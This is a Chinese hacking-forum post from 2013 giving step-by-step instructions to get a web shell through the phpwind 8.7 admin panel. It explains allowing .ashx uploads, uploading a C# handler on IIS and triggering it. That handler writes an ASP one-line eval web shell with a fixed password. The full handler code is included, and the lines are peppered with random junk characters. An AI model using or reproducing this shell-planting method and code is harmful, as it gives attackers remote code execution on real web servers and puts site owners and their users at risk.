找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2428|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
9 F' D. a& q' m: S. c# v! s0 W' L
7 C& S0 c3 m0 U群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx9 e# k) `) V/ K. q$ F
: n7 {7 Q; ~+ `$ _: n0 p% _
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整$ K3 i  X; o' M* U1 J
# N* {$ C& c1 X! a
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx; ?  Q$ x4 O( `, J7 p# `* {) `; r

1 q. F! F1 G# t8 g6 H% l打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
0 {& f1 i0 e6 J3 x! R  n9 J" I& n
1 \" j+ l( A5 T$ _4 M下面是代码:
0 `5 X, m- m9 L1 U; G
* ]. m0 D2 c9 K2 \- A<%@ WebHandler Language="C#"Class="Handler" %>
3 _. \! A+ }! b. p, n/ Rusing System;
" `4 n% t7 P) Y" p9 x5 Xusing System.Web;
: K3 a5 V9 ~, o8 I. e  zusing System.IO;
7 C: G1 ^& N4 tpublic class Handler : IHttpHandler {
0 ^! \7 D" O" Z$ f# ipublic void ProcessRequest (HttpContext context) {
& y; g8 q+ p; G! B; ?: }  k% T. dcontext.Response.ContentType = "text/plain";
3 {' ?; Y- e& {1 hStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));+ f/ m. R8 G3 T- Z4 ~1 X4 U
file1.Write("<%eval request(\"r00ts\")%>");+ C3 |4 F, E$ u6 h2 h
file1.Flush();5 [: p$ f/ ?; [
file1.Close();
4 O7 S! v0 T: B}
( u! ?+ |. ^- n3 s" e# `( \4 O+ Vpublic bool IsReusable {7 X( E: d$ h& N# A: B6 ?! Y8 Y8 L6 p
get {
, l1 I- [2 y" L! N* a- O: Areturn false;
- P7 T  m8 C3 o5 @: Z' i}
% x9 M2 ~! J7 T; {( Z" ~}2 k, F# a* z# v- o' d. D9 U
}+ D2 Z! e& }( y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表